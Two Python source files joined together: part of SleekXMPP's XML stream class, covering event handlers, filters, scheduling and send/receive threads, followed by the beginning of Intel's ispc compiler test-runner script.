if cert_ttl.days < 0:
log.warn('CERT: Certificate has expired.')
restart()
try:
total_seconds = cert_ttl.total_seconds()
except AttributeError:
# for Python < 2.7
total_seconds = (cert_ttl.microseconds + (cert_ttl.seconds + cert_ttl.days * 24 * 3600) * 10**6) / 10**6
log.info('CERT: Time until certificate expiration: %s' % cert_ttl)
self.schedule('Certificate Expiration',
total_seconds,
restart)
def _start_keepalive(self, event):
"""Begin sending whitespace periodically to keep the connection alive.
May be disabled by setting::
self.whitespace_keepalive = False
The keepalive interval can be set using::
self.whitespace_keepalive_interval = 300
"""
if self.whitespace_keepalive:
self.schedule('Whitespace Keepalive',
self.whitespace_keepalive_interval,
self.send_raw,
args=(' ',),
kwargs={'now': True},
repeat=True)
def _remove_schedules(self, event):
"""Remove whitespace keepalive and certificate expiration schedules."""
self.scheduler.remove('Whitespace Keepalive')
self.scheduler.remove('Certificate Expiration')
def start_stream_handler(self, xml):
"""Perform any initialization actions, such as handshakes,
once the stream header has been sent.
Meant to be overridden.
"""
pass
def register_stanza(self, stanza_class):
"""Add a stanza object class as a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that appear as substanzas of a root stanza do not need to
be registered here. That is done using register_stanza_plugin() from
sleekxmpp.xmlstream.stanzabase.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
:param stanza_class: The top-level stanza object's class.
"""
self.__root_stanza.append(stanza_class)
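# Illustrative sketch (names are assumptions, not from this module): a custom
# root stanza is a StanzaBase subclass with a name and namespace, registered
# so that matching top-level elements are converted into it.
#
#     class MyStanza(StanzaBase):
#         name = 'mystanza'                    # element tag
#         namespace = 'urn:example:custom'     # element namespace
#         interfaces = set(['value'])
#
#     xmpp.register_stanza(MyStanza)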
def remove_stanza(self, stanza_class):
"""Remove a stanza from being a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
"""
self.__root_stanza.remove(stanza_class)
def add_filter(self, mode, handler, order=None):
"""Add a filter for incoming or outgoing stanzas.
These filters are applied before incoming stanzas are
passed to any handlers, and before outgoing stanzas
are put in the send queue.
Each filter must accept a single stanza, and return
either a stanza or ``None``. If the filter returns
``None``, then the stanza will be dropped from being
processed for events or from being sent.
:param mode: One of ``'in'`` or ``'out'``.
:param handler: The filter function.
:param int order: The position to insert the filter in
the list of active filters.
"""
if order:
self.__filters[mode].insert(order, handler)
else:
self.__filters[mode].append(handler)
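# Illustrative sketch (assumes an XMLStream-based client `xmpp`): an outgoing
# filter that drops error stanzas. Returning None prevents the stanza from
# being queued for sending.
#
#     def drop_errors(stanza):
#         if stanza['type'] == 'error':
#             return None
#         return stanza
#
#     xmpp.add_filter('out', drop_errors)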
def del_filter(self, mode, handler):
"""Remove an incoming or outgoing filter."""
self.__filters[mode].remove(handler)
def add_handler(self, mask, pointer, name=None, disposable=False,
threaded=False, filter=False, instream=False):
"""A shortcut method for registering a handler using XML masks.
The use of :meth:`register_handler()` is preferred.
:param mask: An XML snippet matching the structure of the
stanzas that will be passed to this handler.
:param pointer: The handler function itself.
:param name: A unique name for the handler. A name will
be generated if one is not provided.
:param disposable: Indicates if the handler should be discarded
after one use.
:param threaded: **DEPRECATED**.
Remains for backwards compatibility.
:param filter: **DEPRECATED**.
Remains for backwards compatibility.
:param instream: Indicates if the handler should execute during
stream processing and not during normal event
processing.
"""
# To prevent circular dependencies, we must load the matcher
# and handler classes here.
if name is None:
name = 'add_handler_%s' % self.new_id()
self.register_handler(
XMLCallback(name,
MatchXMLMask(mask, self.default_ns),
pointer,
once=disposable,
instream=instream))
def register_handler(self, handler, before=None, after=None):
"""Add a stream event handler that will be executed when a matching
stanza is received.
:param handler:
The :class:`~sleekxmpp.xmlstream.handler.base.BaseHandler`
derived object to execute.
"""
if handler.stream is None:
self.__handlers.append(handler)
handler.stream = weakref.ref(self)
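# Illustrative sketch (assumes an XMLStream-based client `xmpp`): registering
# a stream handler with an XPath matcher, using the Callback handler and
# MatchXPath matcher from sleekxmpp.xmlstream.handler and
# sleekxmpp.xmlstream.matcher.
#
#     from sleekxmpp.xmlstream.handler import Callback
#     from sleekxmpp.xmlstream.matcher import MatchXPath
#
#     def handle_custom_query(iq):
#         pass  # process the matched stanza
#
#     xmpp.register_handler(
#         Callback('Custom Query',
#                  MatchXPath('{%s}iq/{urn:example:custom}query' % xmpp.default_ns),
#                  handle_custom_query))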
def remove_handler(self, name):
"""Remove any stream event handlers with the given name.
:param name: The name of the handler.
"""
idx = 0
for handler in self.__handlers:
if handler.name == name:
self.__handlers.pop(idx)
return True
idx += 1
return False
def get_dns_records(self, domain, port=None):
"""Get the DNS records for a domain.
:param domain: The domain in question.
:param port: If the results don't include a port, use this one.
"""
if port is None:
port = self.default_port
resolver = default_resolver()
self.configure_dns(resolver, domain=domain, port=port)
return resolve(domain, port, service=self.dns_service,
resolver=resolver,
use_ipv6=self.use_ipv6,
use_dnspython=self.use_dnspython)
def pick_dns_answer(self, domain, port=None):
"""Pick a server and port from DNS answers.
Gets DNS answers if none available.
Removes used answer from available answers.
:param domain: The domain in question.
:param port: If the results don't include a port, use this one.
"""
if not self.dns_answers:
self.dns_answers = self.get_dns_records(domain, port)
if sys.version_info < (3, 0):
return self.dns_answers.next()
else:
return next(self.dns_answers)
def add_event_handler(self, name, pointer,
threaded=False, disposable=False):
"""Add a custom event handler that will be executed whenever
its event is manually triggered.
:param name: The name of the event that will trigger
this handler.
:param pointer: The function to execute.
:param threaded: If set to ``True``, the handler will execute
in its own thread. Defaults to ``False``.
:param disposable: If set to ``True``, the handler will be
discarded after one use. Defaults to ``False``.
"""
if not name in self.__event_handlers:
self.__event_handlers[name] = []
self.__event_handlers[name].append((pointer, threaded, disposable))
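# Illustrative sketch (assumes an XMLStream-based client `xmpp`): a handler
# that runs once, in its own thread, when the 'session_start' event fires.
#
#     def on_session_start(event):
#         pass  # e.g. send initial presence, fetch the roster
#
#     xmpp.add_event_handler('session_start', on_session_start,
#                            threaded=True, disposable=True)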
def del_event_handler(self, name, pointer):
"""Remove a function as a handler for an event.
:param name: The name of the event.
:param pointer: The function to remove as a handler.
"""
if not name in self.__event_handlers:
return
# Need to keep handlers that do not use
# the given function pointer
def filter_pointers(handler):
return handler[0] != pointer
self.__event_handlers[name] = list(filter(
filter_pointers,
self.__event_handlers[name]))
def event_handled(self, name):
"""Returns the number of registered handlers for an event.
:param name: The name of the event to check.
"""
return len(self.__event_handlers.get(name, []))
def event(self, name, data=None, direct=False):
"""Manually trigger a custom event.
:param name: The name of the event to trigger.
:param data: Data that will be passed to each event handler.
Defaults to an empty dictionary, but is usually
a stanza object.
:param direct: Runs the event directly if True, skipping the
event queue. All event handlers will run in the
same thread.
"""
if not data:
data = {}
log.debug("Event triggered: " + name)
handlers = self.__event_handlers.get(name, [])
for handler in handlers:
#TODO: Data should not be copied, but should be read-only;
# changing this might break existing code, so it is left for the future.
out_data = copy.copy(data) if len(handlers) > 1 else data
old_exception = getattr(data, 'exception', None)
if direct:
try:
handler[0](out_data)
except Exception as e:
error_msg = 'Error processing event handler: %s'
log.exception(error_msg, str(handler[0]))
if old_exception:
old_exception(e)
else:
self.exception(e)
else:
self.event_queue.put(('event', handler, out_data))
if handler[2]:
# If the handler is disposable, we will go ahead and
# remove it now instead of waiting for it to be
# processed in the queue.
with self.__event_handlers_lock:
try:
h_index = self.__event_handlers[name].index(handler)
self.__event_handlers[name].pop(h_index)
except:
pass
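# Illustrative sketch (assumes an XMLStream-based client `xmpp`): application
# code can raise its own events; any handlers added with
# add_event_handler('upload_done', ...) will receive the data object.
#
#     xmpp.event('upload_done', {'url': 'https://example.com/f.png'})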
def schedule(self, name, seconds, callback, args=None,
kwargs=None, repeat=False):
"""Schedule a callback function to execute after a given delay.
:param name: A unique name for the scheduled callback.
:param seconds: The time in seconds to wait before executing.
:param callback: A pointer to the function to execute.
:param args: A tuple of arguments to pass to the function.
:param kwargs: A dictionary of keyword arguments to pass to
the function.
:param repeat: Flag indicating if the scheduled event should
be reset and repeat after executing.
"""
self.scheduler.add(name, seconds, callback, args, kwargs,
repeat, qpointer=self.event_queue)
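# Illustrative sketch (assumes an XMLStream-based client `xmpp`): run a
# callback every 60 seconds until the entry is removed via
# self.scheduler.remove('Ping Check').
#
#     def ping_check():
#         pass  # e.g. send an application-level keepalive
#
#     xmpp.schedule('Ping Check', 60, ping_check, repeat=True)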
def incoming_filter(self, xml):
"""Filter incoming XML objects before they are processed.
Possible uses include remapping namespaces, or correcting elements
from sources with incorrect behavior.
Meant to be overridden.
"""
return xml
def send(self, data, mask=None, timeout=None, now=False, use_filters=True):
"""A wrapper for :meth:`send_raw()` for sending stanza objects.
May optionally block until an expected response is received.
:param data: The :class:`~sleekxmpp.xmlstream.stanzabase.ElementBase`
stanza to send on the stream.
:param mask: **DEPRECATED**
An XML string snippet matching the structure
of the expected response. Execution will block
in this thread until the response is received
or a timeout occurs.
:param int timeout: Time in seconds to wait for a response before
continuing. Defaults to :attr:`response_timeout`.
:param bool now: Indicates if the send queue should be skipped,
sending the stanza immediately. Useful mainly
for stream initialization stanzas.
Defaults to ``False``.
:param bool use_filters: Indicates if outgoing filters should be
applied to the given stanza data. Disabling
filters is useful when resending stanzas.
Defaults to ``True``.
"""
if timeout is None:
timeout = self.response_timeout
if hasattr(mask, 'xml'):
mask = mask.xml
if isinstance(data, ElementBase):
if use_filters:
for filter in self.__filters['out']:
data = filter(data)
if data is None:
return
if mask is not None:
log.warning("Use of send mask waiters is deprecated.")
wait_for = Waiter("SendWait_%s" % self.new_id(),
MatchXMLMask(mask))
self.register_handler(wait_for)
if isinstance(data, ElementBase):
with self.send_queue_lock:
if use_filters:
for filter in self.__filters['out_sync']:
data = filter(data)
if data is None:
return
str_data = tostring(data.xml, xmlns=self.default_ns,
stream=self,
top_level=True)
self.send_raw(str_data, now)
else:
self.send_raw(data, now)
if mask is not None:
return wait_for.wait(timeout)
def send_xml(self, data, mask=None, timeout=None, now=False):
"""Send an XML object on the stream, and optionally wait
for a response.
:param data: The :class:`~xml.etree.ElementTree.Element` XML object
to send on the stream.
:param mask: **DEPRECATED**
An XML string snippet matching the structure
of the expected response. Execution will block
in this thread until the response is received
or a timeout occurs.
:param int timeout: Time in seconds to wait for a response before
continuing. Defaults to :attr:`response_timeout`.
:param bool now: Indicates if the send queue should be skipped,
sending the stanza immediately. Useful mainly
for stream initialization stanzas.
Defaults to ``False``.
"""
if timeout is None:
timeout = self.response_timeout
return self.send(tostring(data), mask, timeout, now)
def send_raw(self, data, now=False, reconnect=None):
"""Send raw data across the stream.
:param string data: Any string value.
:param bool reconnect: Indicates if the stream should be
restarted if there is an error sending
the stanza. Used mainly for testing.
Defaults to :attr:`auto_reconnect`.
"""
if now:
log.debug("SEND (IMMED): %s", data)
try:
data = data.encode('utf-8')
total = len(data)
sent = 0
count = 0
tries = 0
with self.send_lock:
while sent < total and not self.stop.is_set():
try:
sent += self.socket.send(data[sent:])
count += 1
except ssl.SSLError as serr:
if tries >= self.ssl_retry_max:
log.debug('SSL error: max retries reached')
self.exception(serr)
log.warning("Failed to send %s", data)
if reconnect is None:
reconnect = self.auto_reconnect
if not self.stop.is_set():
self.disconnect(reconnect,
send_close=False)
log.warning('SSL write error: retrying')
if not self.stop.is_set():
time.sleep(self.ssl_retry_delay)
tries += 1
except Socket.error as serr:
if serr.errno != errno.EINTR:
raise
if count > 1:
log.debug('SENT: %d chunks', count)
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
log.warning("Failed to send %s", data)
if reconnect is None:
reconnect = self.auto_reconnect
if not self.stop.is_set():
self.disconnect(reconnect, send_close=False)
else:
self.send_queue.put(data)
return True
def _start_thread(self, name, target, track=True):
self.__thread[name] = threading.Thread(name=name, target=target)
self.__thread[name].daemon = self._use_daemons
self.__thread[name].start()
if track:
self.__active_threads.add(name)
with self.__thread_cond:
self.__thread_count += 1
def _end_thread(self, name, early=False):
with self.__thread_cond:
curr_thread = threading.current_thread().name
if curr_thread in self.__active_threads:
self.__thread_count -= 1
self.__active_threads.remove(curr_thread)
if early:
log.debug('Threading deadlock prevention!')
log.debug(("Marked %s thread as ended due to " + \
"disconnect() call. %s threads remain.") % (
name, self.__thread_count))
else:
log.debug("Stopped %s thread. %s threads remain." % (
name, self.__thread_count))
else:
log.debug(("Finished exiting %s thread after early " + \
"termination from disconnect() call. " + \
"%s threads remain.") % (
name, self.__thread_count))
if self.__thread_count == 0:
self.__thread_cond.notify()
def set_stop(self):
self.stop.set()
# Unlock queues
self.event_queue.put(None)
self.send_queue.put(None)
def _wait_for_threads(self):
with self.__thread_cond:
if self.__thread_count != 0:
log.debug("Waiting for %s threads to exit." %
self.__thread_count)
name = threading.current_thread().name
if name in self.__thread:
self._end_thread(name, early=True)
self.__thread_cond.wait(4)
if self.__thread_count != 0:
log.error("Hanged threads: %s" % threading.enumerate())
log.error("This may be due to calling disconnect() " + \
"from a non-threaded event handler. Be " + \
"sure that event handlers that call " + \
"disconnect() are registered using: " + \
"add_event_handler(..., threaded=True)")
def process(self, **kwargs):
"""Initialize the XML streams and begin processing events.
The number of threads used for processing stream events is determined
by :data:`HANDLER_THREADS`.
:param bool block: If ``False``, then event dispatcher will run
in a separate thread, allowing for the stream to be
used in the background for another application.
Otherwise, ``process(block=True)`` blocks the current
thread. Defaults to ``False``.
:param bool threaded: **DEPRECATED**
If ``True``, then event dispatcher will run
in a separate thread, allowing for the stream to be
used in the background for another application.
Defaults to ``True``. This does **not** mean that no
threads are used at all if ``threaded=False``.
Regardless of these threading options, these threads will
always exist:
- The event queue processor
- The send queue processor
- The scheduler
"""
if 'threaded' in kwargs and 'block' in kwargs:
raise ValueError("process() called with both " + \
"block and threaded arguments")
elif 'block' in kwargs:
threaded = not(kwargs.get('block', False))
else:
threaded = kwargs.get('threaded', True)
for t in range(0, HANDLER_THREADS):
log.debug("Starting HANDLER THREAD")
self._start_thread('event_thread_%s' % t, self._event_runner)
self._start_thread('send_thread', self._send_thread)
self._start_thread('scheduler_thread', self._scheduler_thread)
if threaded:
# Run the XML stream in the background for another application.
self._start_thread('read_thread', self._process, track=False)
else:
self._process()
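# Illustrative sketch (assumption): the typical driver for an XMLStream-based
# client such as sleekxmpp.ClientXMPP.
#
#     xmpp = ClientXMPP('user@example.com', 'password')
#     if xmpp.connect():
#         xmpp.process(block=True)   # returns once disconnect() completes
#     else:
#         print('Unable to connect.')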
def _process(self):
"""Start processing the XML streams.
Processing will continue after any recoverable errors
if reconnections are allowed.
"""
# The body of this loop will only execute once per connection.
# Additional passes will be made only if an error occurs and
# reconnecting is permitted.
while True:
shutdown = False
try:
# The call to self.__read_xml will block and prevent
# the body of the loop from running until a disconnect
# occurs. After any reconnection, the stream header will
# be resent and processing will resume.
while not self.stop.is_set():
# Only process the stream while connected to the server
if not self.state.ensure('connected', wait=0.1):
break
# Ensure the stream header is sent for any
# new connections.
if not self.session_started_event.is_set():
self.send_raw(self.stream_header, now=True)
if not self.__read_xml():
# If the server terminated the stream, end processing
break
except KeyboardInterrupt:
log.debug("Keyboard Escape Detected in _process")
self.event('killed', direct=True)
shutdown = True
except SystemExit:
log.debug("SystemExit in _process")
shutdown = True
except (SyntaxError, ExpatError) as e:
log.error("Error reading from XML stream.")
self.exception(e)
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
log.error('Socket Error #%s: %s', serr.errno, serr.strerror)
except ValueError as e:
msg = e.message if hasattr(e, 'message') else e.args[0]
if 'I/O operation on closed file' in msg:
log.error('Can not read from closed socket.')
else:
self.exception(e)
except Exception as e:
if not self.stop.is_set():
log.error('Connection error.')
self.exception(e)
if not shutdown and not self.stop.is_set() \
and self.auto_reconnect:
self.reconnect()
else:
self.disconnect()
break
def __read_xml(self):
"""Parse the incoming XML stream
Stream events are raised for each received stanza.
"""
depth = 0
root = None
for event, xml in ET.iterparse(self.filesocket, (b'end', b'start')):
if event == b'start':
if depth == 0:
# We have received the start of the root element.
root = xml
log.debug('RECV: %s', tostring(root, xmlns=self.default_ns,
stream=self,
top_level=True,
open_only=True))
# Perform any stream initialization actions, such
# as handshakes.
self.stream_end_event.clear()
self.start_stream_handler(root)
# We have a successful stream connection, so reset
# exponential backoff for new reconnect attempts.
self.reconnect_delay = 1.0
depth += 1
if event == b'end':
depth -= 1
if depth == 0:
# The stream's root element has closed,
# terminating the stream.
log.debug("End of stream recieved")
self.stream_end_event.set()
return False
elif depth == 1:
# We only raise events for stanzas that are direct
# children of the root element.
try:
self.__spawn_event(xml)
except RestartStream:
return True
if root is not None:
# Keep the root element empty of children to
# save on memory use.
root.clear()
log.debug("Ending read XML loop")
def _build_stanza(self, xml, default_ns=None):
"""Create a stanza object from a given XML object.
If a specialized stanza type is not found for the XML, then
a generic :class:`~sleekxmpp.xmlstream.stanzabase.StanzaBase`
stanza will be returned.
:param xml: The :class:`~xml.etree.ElementTree.Element` XML object
to convert into a stanza object.
:param default_ns: Optional default namespace to use instead of the
stream's current default namespace.
"""
if default_ns is None:
default_ns = self.default_ns
stanza_type = StanzaBase
for stanza_class in self.__root_stanza:
if xml.tag == "{%s}%s" % (default_ns, stanza_class.name) or \
xml.tag == stanza_class.tag_name():
stanza_type = stanza_class
break
stanza = stanza_type(self, xml)
if stanza['lang'] is None and self.peer_default_lang:
stanza['lang'] = self.peer_default_lang
return stanza
def __spawn_event(self, xml):
"""
Analyze incoming XML stanzas and convert them into stanza
objects if applicable and queue stream events to be processed
by matching handlers.
:param xml: The :class:`~sleekxmpp.xmlstream.stanzabase.ElementBase`
stanza to analyze.
"""
# Apply any preprocessing filters.
xml = self.incoming_filter(xml)
# Convert the raw XML object into a stanza object. If no registered
# stanza type applies, a generic StanzaBase stanza will be used.
stanza = self._build_stanza(xml)
for filter in self.__filters['in']:
if stanza is not None:
stanza = filter(stanza)
if stanza is None:
return
log.debug("RECV: %s", stanza)
# Match the stanza against registered handlers. Handlers marked
# to run "in stream" will be executed immediately; the rest will
# be queued.
unhandled = True
matched_handlers = [h for h in self.__handlers if h.match(stanza)]
for handler in matched_handlers:
if len(matched_handlers) > 1:
stanza_copy = copy.copy(stanza)
else:
stanza_copy = stanza
handler.prerun(stanza_copy)
self.event_queue.put(('stanza', handler, stanza_copy))
try:
if handler.check_delete():
self.__handlers.remove(handler)
except:
pass # not thread safe
unhandled = False
# Some stanzas require responses, such as Iq queries. A default
# handler will be executed immediately for this case.
if unhandled:
stanza.unhandled()
def _threaded_event_wrapper(self, func, args):
"""Capture exceptions for event handlers that run
in individual threads.
:param func: The event handler to execute.
:param args: Arguments to the event handler.
"""
# The stanza data has already been copied before this wrapper is invoked.
orig = args[0]
try:
func(*args)
except Exception as e:
error_msg = 'Error processing event handler: %s'
log.exception(error_msg, str(func))
if hasattr(orig, 'exception'):
orig.exception(e)
else:
self.exception(e)
def _event_runner(self):
"""Process the event queue and execute handlers.
The number of event runner threads is controlled by HANDLER_THREADS.
Stream event handlers will all execute in this thread. Custom event
handlers may be spawned in individual threads.
"""
log.debug("Loading event runner")
try:
while not self.stop.is_set():
event = self.event_queue.get()
if event is None:
continue
etype, handler = event[0:2]
args = event[2:]
orig = copy.copy(args[0])
if etype == 'stanza':
try:
handler.run(args[0])
except Exception as e:
error_msg = 'Error processing stream handler: %s'
log.exception(error_msg, handler.name)
orig.exception(e)
elif etype == 'schedule':
name = args[2]
try:
log.debug('Scheduled event: %s: %s', name, args[0])
handler(*args[0], **args[1])
except Exception as e:
log.exception('Error processing scheduled task')
self.exception(e)
elif etype == 'event':
func, threaded, disposable = handler
try:
if threaded:
x = threading.Thread(
name="Event_%s" % str(func),
target=self._threaded_event_wrapper,
args=(func, args))
x.daemon = self._use_daemons
x.start()
else:
func(*args)
except Exception as e:
error_msg = 'Error processing event handler: %s'
log.exception(error_msg, str(func))
if hasattr(orig, 'exception'):
orig.exception(e)
else:
self.exception(e)
elif etype == 'quit':
log.debug("Quitting event runner thread")
break
except KeyboardInterrupt:
log.debug("Keyboard Escape Detected in _event_runner")
self.event('killed', direct=True)
self.disconnect()
except SystemExit:
self.disconnect()
self.event_queue.put(('quit', None, None))
self._end_thread('event runner')
def _send_thread(self):
"""Extract stanzas from the send queue and send them on the stream."""
try:
while not self.stop.is_set():
while not self.stop.is_set() and \
not self.session_started_event.is_set():
self.session_started_event.wait(timeout=0.1) # Wait for session start
if self.__failed_send_stanza is not None:
data = self.__failed_send_stanza
self.__failed_send_stanza = None
else:
data = self.send_queue.get() # Wait for data to send
if data is None:
continue
log.debug("SEND: %s", data)
enc_data = data.encode('utf-8')
total = len(enc_data)
sent = 0
count = 0
tries = 0
try:
with self.send_lock:
while sent < total and not self.stop.is_set() and \
self.session_started_event.is_set():
try:
sent += self.socket.send(enc_data[sent:])
count += 1
except ssl.SSLError as serr:
if tries >= self.ssl_retry_max:
log.debug('SSL error: max retries reached')
self.exception(serr)
log.warning("Failed to send %s", data)
if not self.stop.is_set():
self.disconnect(self.auto_reconnect,
send_close=False)
log.warning('SSL write error: retrying')
if not self.stop.is_set():
time.sleep(self.ssl_retry_delay)
tries += 1
except Socket.error as serr:
if serr.errno != errno.EINTR:
raise
if count > 1:
log.debug('SENT: %d chunks', count)
self.send_queue.task_done()
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
log.warning("Failed to send %s", data)
if not self.stop.is_set():
self.__failed_send_stanza = data
self._end_thread('send')
self.disconnect(self.auto_reconnect, send_close=False)
return
except Exception as ex:
log.exception('Unexpected error in send thread: %s', ex)
self.exception(ex)
if not self.stop.is_set():
self._end_thread('send')
self.disconnect(self.auto_reconnect)
return
self._end_thread('send')
def _scheduler_thread(self):
self.scheduler.process(threaded=False)
self._end_thread('scheduler')
def exception(self, exception):
"""Process an unknown exception.
Meant to be overridden.
:param exception: An unhandled exception object.
"""
pass
# To comply with PEP8, method names now use underscores.
# Deprecated method names are re-mapped for backwards compatibility.
XMLStream.startTLS = XMLStream.start_tls
XMLStream.registerStanza = XMLStream.register_stanza
XMLStream.removeStanza = XMLStream.remove_stanza
XMLStream.registerHandler = XMLStream.register_handler
XMLStream.removeHandler = XMLStream.remove_handler
XMLStream.setSocket = XMLStream.set_socket
XMLStream.sendRaw = XMLStream.send_raw
XMLStream.getId = XMLStream.get_id
XMLStream.getNewId = XMLStream.new_id
XMLStream.sendXML = XMLStream.send_xml
|
run_tests.py
|
#!/usr/bin/python
#
# Copyright (c) 2013-2018, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Test-running driver for ispc.
# Utility routine to print an update on the number of tests that have been
# finished. Should be called with the lock held.
def update_progress(fn, total_tests_arg, counter, max_test_length_arg):
counter.value += 1
if options.non_interactive == False:
progress_str = " Done %d / %d [%s]" % (counter.value, total_tests_arg, fn)
# spaces to clear out detritus from previous printing...
spaces_needed = max_test_length_arg - len(fn)
for x in range(spaces_needed):
progress_str += ' '
progress_str += '\r'
sys.stdout.write(progress_str)
sys.stdout.flush()
# This is a workaround for the missing timeout functionality in Python 2.7.
class RunWithTimeout(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ""
def run(self, timeout):
def target():
try:
self.process = subprocess.Popen(self.cmd, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except:
print_debug("ERROR: The child (%s) raised an exception: %s\n" % (cmd, sys.exc_info()[1]), s, run_tests_log)
raise
out = self.process.communicate()
self.output += out[0].decode("utf-8")
self.output += out[1].decode("utf-8")
thread = threading.Thread(target=target)
thread.start()
timeout_fail = False
thread.join(timeout)
if thread.is_alive():
timeout_fail = True
self.process.terminate()
thread.join()
return (self.process.returncode, self.output, timeout_fail)
# 240 seconds is enough even for the longest test under SDE.
def run_command(cmd, timeout=600):
if options.verbose:
print_debug("Running: %s\n" % cmd, s, run_tests_log)
# Here's a slightly tricky part. To pass a command for execution, we need to
# break the line down into arguments. The shlex class is designed exactly
# for this purpose, but by default it interprets escape sequences.
# On Windows, backslashes are all over the place and would be treated as
# escape sequences, so we explicitly disable escape handling.
lexer = shlex.shlex(cmd, posix=True)
lexer.whitespace_split = True
lexer.escape = ''
arg_list = list(lexer)
run = RunWithTimeout(cmd=arg_list)
(ret_code, output, is_timeout) = run.run(timeout)
return (ret_code, output, is_timeout)
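# A small sketch of why escape handling is disabled above (illustrative only):
# with the default escape character, a Windows path such as C:\tests\a.obj
# would lose its backslashes; with lexer.escape = '' the arguments come back
# intact.
#
#     lexer = shlex.shlex(r'cl /Fea.exe C:\tests\a.obj', posix=True)
#     lexer.whitespace_split = True
#     lexer.escape = ''
#     list(lexer)   # -> ['cl', '/Fea.exe', 'C:\\tests\\a.obj']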
# run the commands in cmd_list
def run_cmds(compile_cmds, run_cmd, filename, expect_failure):
for cmd in compile_cmds:
(return_code, output, timeout) = run_command(cmd, 10)
compile_failed = (return_code != 0)
if compile_failed:
print_debug("Compilation of test %s failed %s \n" % (filename, "due to TIMEOUT" if timeout else ""), s, run_tests_log)
if output != "":
print_debug("%s" % output.encode("utf-8"), s, run_tests_log)
return (1, 0)
if not options.save_bin:
(return_code, output, timeout) = run_command(run_cmd)
run_failed = (return_code != 0) or timeout
else:
run_failed = 0
surprise = ((expect_failure and not run_failed) or
(not expect_failure and run_failed))
if surprise == True:
print_debug("Test %s %s (return code %d) \n" % \
(filename, "unexpectedly passed" if expect_failure else "failed",
return_code), s, run_tests_log)
if output != "":
print_debug("%s\n" % output.encode("utf-8"), s, run_tests_log)
if surprise == True:
return (0, 1)
else:
return (0, 0)
def add_prefix(path):
global is_windows
if is_windows:
# On Windows we run tests in tmp dir, so the root is one level up.
input_prefix = "..\\"
else:
input_prefix = ""
path = input_prefix + path
path = os.path.abspath(path)
return path
def check_test(filename):
prev_arch = False
prev_os = False
done_arch = True
done_os = True
done = True
global is_windows
if is_windows:
oss = "windows"
else:
oss = "linux"
b = buffer(file(add_prefix(filename)).read())
for run in re.finditer('// *rule: run on .*', b):
arch = re.match('.* arch=.*', run.group())
if arch != None:
if re.search(' arch='+options.arch+'$', arch.group()) != None:
prev_arch = True
if re.search(' arch='+options.arch+' ', arch.group()) != None:
prev_arch = True
done_arch = prev_arch
OS = re.match('.* OS=.*', run.group())
if OS != None:
if re.search(' OS='+oss, OS.group()) != None:
prev_os = True
done_os = prev_os
done = done_arch and done_os
for skip in re.finditer('// *rule: skip on .*', b):
if re.search(' arch=' + options.arch + '$', skip.group())!=None:
done = False
if re.search(' arch=' + options.arch + ' ', skip.group())!=None:
done = False
if re.search(' OS=' + oss, skip.group())!=None:
done = False
return done
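# Illustrative sketch (assumption): the directives parsed above are plain
# comments near the top of a test file, e.g.:
#
#     // rule: run on arch=x86-64
#     // rule: run on OS=linux
#     // rule: skip on arch=arm
#
# A test is run only when its "run on" constraints (if any) match the current
# arch/OS and no "skip on" constraint matches.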
def run_test(testname):
# testname is a path to the test from the root of ispc dir
# filename is a path to the test from the current dir
# ispc_exe_rel is a relative path to ispc
filename = add_prefix(testname)
ispc_exe_rel = add_prefix(ispc_exe)
# is this a test to make sure an error is issued?
want_error = (filename.find("tests_errors") != -1)
if want_error == True:
if (options.target == "knc-generic"):
ispc_cmd = ispc_exe_rel + " --werror --nowrap %s --arch=%s --target=%s" % \
(filename, options.arch, "generic-16")
elif (options.target == "knl-generic"):
ispc_cmd = ispc_exe_rel + " --werror --nowrap %s --arch=%s --target=%s" % \
(filename, options.arch, "generic-16")
else:
ispc_cmd = ispc_exe_rel + " --werror --nowrap %s --arch=%s --target=%s" % \
(filename, options.arch, options.target)
(return_code, output, timeout) = run_command(ispc_cmd, 10)
got_error = (return_code != 0) or timeout
# figure out the error message we're expecting
file = open(filename, 'r')
firstline = file.readline()
firstline = firstline.replace("//", "")
firstline = firstline.lstrip()
firstline = firstline.rstrip()
file.close()
if re.search(firstline, output) == None:
print_debug("Didn't see expected error message %s from test %s.\nActual output:\n%s\n" % \
(firstline, testname, output), s, run_tests_log)
return (1, 0)
elif got_error == False:
print_debug("Unexpectedly no errors issued from test %s\n" % testname, s, run_tests_log)
return (1, 0)
else:
return (0, 0)
else:
# do we expect this test to fail?
should_fail = (testname.find("failing_") != -1)
# We need to figure out the signature of the test
# function that this test has.
